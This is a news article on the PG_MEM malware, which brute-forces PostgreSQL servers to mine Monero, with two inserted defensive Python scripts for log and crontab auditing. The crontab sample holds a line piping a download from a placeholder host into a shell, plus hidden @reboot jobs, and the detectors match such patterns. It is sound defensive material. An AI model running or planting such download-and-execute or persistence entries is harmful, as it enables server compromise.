Over 800k servers at risk due to new cryptojacking malware exploiting PostgreSQL

Researchers at Aqua Nautilus have recently unveiled a sophisticated malware strain that specifically targets PostgreSQL servers, enabling the deployment of cryptocurrency miners. This discovery highlights a significant cybersecurity threat, as the firm has identified over 800,000 servers that may be vulnerable to a cryptojacking campaign aimed at PostgreSQL, a widely used open-source relational database management system.

According to a detailed research report shared with crypto.news, the malware, dubbed “PG_MEM,” initiates its attack by employing brute force techniques to gain unauthorized access to PostgreSQL databases, particularly those secured with weak passwords. Once it successfully infiltrates a database, PG_MEM establishes a superuser role, granting it administrative privileges that allow it to exert full control over the database environment and restrict access for legitimate users.

With this elevated access, the malware can execute shell commands on the host system, paving the way for the download and deployment of additional malicious payloads. The report indicates that these payloads consist of two files specifically designed to facilitate the malware’s evasion of detection, configure the system for cryptocurrency mining, and deploy the XMRIG mining tool, which is commonly used for mining Monero (XMR).
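The two stages described above (password brute force, then a new SUPERUSER role and shell execution through the database) all leave traces in the PostgreSQL server log. The following script is an added illustration, not code from the Aqua Nautilus report or from the malware: it parses a constructed sample log in the logging collector's default "timestamp [pid] LEVEL: message" layout (assuming log_connections = on and log_statement = 'all'), flags a burst of failed password authentications for one user inside a sliding window, and flags statements that create or alter a role with SUPERUSER or run COPY ... FROM PROGRAM. The thresholds, regexes and sample lines are assumptions for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of a PostgreSQL server log (not taken from the report);
# default logging-collector layout "timestamp [pid] LEVEL:  message".
SAMPLE_LOG = """\
2024-08-20 10:15:01 UTC [1201] FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:02 UTC [1202] FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:02 UTC [1203] FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:03 UTC [1204] FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:03 UTC [1205] FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:04 UTC [1206] LOG:  connection authorized: user=postgres database=postgres
2024-08-20 10:15:05 UTC [1206] LOG:  statement: CREATE ROLE svc_backup WITH SUPERUSER LOGIN
2024-08-20 10:15:06 UTC [1206] LOG:  statement: COPY scratch FROM PROGRAM 'uname -a'
2024-08-20 11:00:00 UTC [1300] LOG:  statement: CREATE TABLE orders (id int)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[(?P<pid>\d+)\] "
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
AUTH_FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
# A role being created or altered with the SUPERUSER attribute.
SUPERUSER_RE = re.compile(r"\b(CREATE|ALTER)\s+(ROLE|USER)\b.*\bSUPERUSER\b", re.I)
# Server-side COPY from a program runs a shell command as the postgres OS user.
PROGRAM_RE = re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I)


def parse_line(line):
    """Split one log line into timestamp, pid, level and message; None if it does not fit."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "pid": int(m["pid"]),
        "level": m["level"],
        "msg": m["msg"],
    }


def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return a list of (kind, detail, timestamp) alerts found in log_text."""
    alerts = []
    failures = defaultdict(deque)  # user -> timestamps of recent auth failures
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        msg = rec["msg"]
        m = AUTH_FAIL_RE.search(msg)
        if m:
            recent = failures[m["user"]]
            recent.append(rec["ts"])
            # Drop failures that fell out of the sliding window.
            while recent and rec["ts"] - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold:
                alerts.append(("brute_force", m["user"], rec["ts"]))
                recent.clear()  # one alert per burst of `threshold` failures
            continue
        if msg.startswith("statement: "):
            stmt = msg[len("statement: "):]
            if SUPERUSER_RE.search(stmt):
                alerts.append(("superuser_grant", stmt, rec["ts"]))
            if PROGRAM_RE.search(stmt):
                alerts.append(("shell_via_copy", stmt, rec["ts"]))
    return alerts


if __name__ == "__main__":
    for kind, detail, ts in detect(SAMPLE_LOG):
        print(f"{ts} {kind}: {detail}")
```

Statement logging at 'all' is expensive on a busy server; a narrower alternative is to keep log_statement = 'ddl' (which still captures CREATE ROLE) and to audit role attributes directly from pg_roles on a schedule, since the superuser grant persists even when the log line that created it has been deleted.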

XMRIG has gained popularity among cybercriminals due to Monero’s privacy features, which make its transactions difficult to trace. A notable incident last year involved an educational platform that was compromised in a cryptojacking operation, where attackers stealthily deployed a script that installed XMRIG on every visitor’s device.

Malware hijacks PostgreSQL servers to deploy crypto miners

Further analysis reveals that PG_MEM not only installs its mining operations but also removes existing cron jobs—automated tasks scheduled to run at specific intervals on the server. In their place, the malware creates new cron jobs to ensure the continuity of the cryptocurrency mining process, even in the event of server restarts or temporary halts of certain processes. To maintain its stealth, PG_MEM systematically deletes files and logs that could potentially reveal its activities to system administrators.
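Because the campaign both deletes an administrator's cron jobs and installs its own, a useful host check is to diff the live crontab against a known-good baseline and to inspect whatever is new. The script below is an added example, not part of the article or the report: it parses crontab-format text, reports expected jobs that have gone missing, and scores unexpected entries against a few heuristics (commands living under /tmp, /var/tmp or /dev/shm, hidden path components, download-and-pipe-to-shell, inline base64 decoding, and @reboot schedules, which survive the restarts the report mentions). The baseline, the current crontab and the heuristic list are all constructed for the example.

```python
import re

# Constructed baseline (the jobs an administrator expects) and a constructed
# current crontab that has lost one job and gained three.
BASELINE = """\
0 2 * * * /usr/local/bin/pg_backup.sh
*/5 * * * * /usr/lib/monitoring/agent --check
"""
CURRENT = """\
# m h dom mon dow command
MAILTO=root
*/5 * * * * /usr/lib/monitoring/agent --check
@reboot /tmp/.x/run.sh
* * * * * /dev/shm/.cache/kswapd >/dev/null 2>&1
*/10 * * * * curl -s http://placeholder.invalid/u | sh
"""

# Either an @-alias (@reboot, @hourly, ...) or five schedule fields, then the command.
CRON_LINE_RE = re.compile(r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<cmd>\S.*)$")

# Heuristics applied to the command part of an unexpected entry.
SUSPICIOUS = [
    ("world-writable directory", re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/")),
    ("hidden path component", re.compile(r"/\.[^/\s]+")),
    ("download piped to shell", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|da|z)?sh\b")),
    ("inline base64 decode", re.compile(r"\bbase64\b\s+(?:-d|--decode)\b")),
]


def parse_crontab(text):
    """Return [(schedule, command), ...], skipping comments, blanks and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE_RE.match(line)
        if m:
            jobs.append((m["sched"], m["cmd"]))
    return jobs


def audit(baseline_text, current_text):
    """Return findings as (status, (schedule, command), reason) tuples."""
    baseline = parse_crontab(baseline_text)
    current = parse_crontab(current_text)
    findings = []
    for job in baseline:
        if job not in current:
            findings.append(("removed", job, "expected job missing from crontab"))
    for sched, cmd in current:
        if (sched, cmd) in baseline:
            continue
        reasons = [name for name, rx in SUSPICIOUS if rx.search(cmd)]
        if sched == "@reboot":
            reasons.append("runs at reboot")
        findings.append(("unexpected", (sched, cmd), "; ".join(reasons) or "not in baseline"))
    return findings


if __name__ == "__main__":
    for status, (sched, cmd), reason in audit(BASELINE, CURRENT):
        print(f"[{status}] {sched} {cmd}  <- {reason}")
```

In practice the baseline would be taken from configuration management and the current view from every crontab the postgres and root users own (plus /etc/cron.d), and a removed entry deserves as much attention as an added one, since the report notes that PG_MEM clears existing jobs before installing its own.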

The researchers have cautioned that while the primary objective of this campaign is to deploy cryptocurrency miners, the attackers simultaneously gain control over the affected servers, underscoring the severity of this threat. Cryptojacking campaigns targeting PostgreSQL databases have been a persistent issue over the years. In 2020, researchers from Palo Alto Networks’ Unit 42 identified a similar cryptojacking campaign involving the PgMiner botnet. Additionally, the StickyDB botnet was discovered in 2018, which also targeted servers to mine Monero.

Tech Optimizer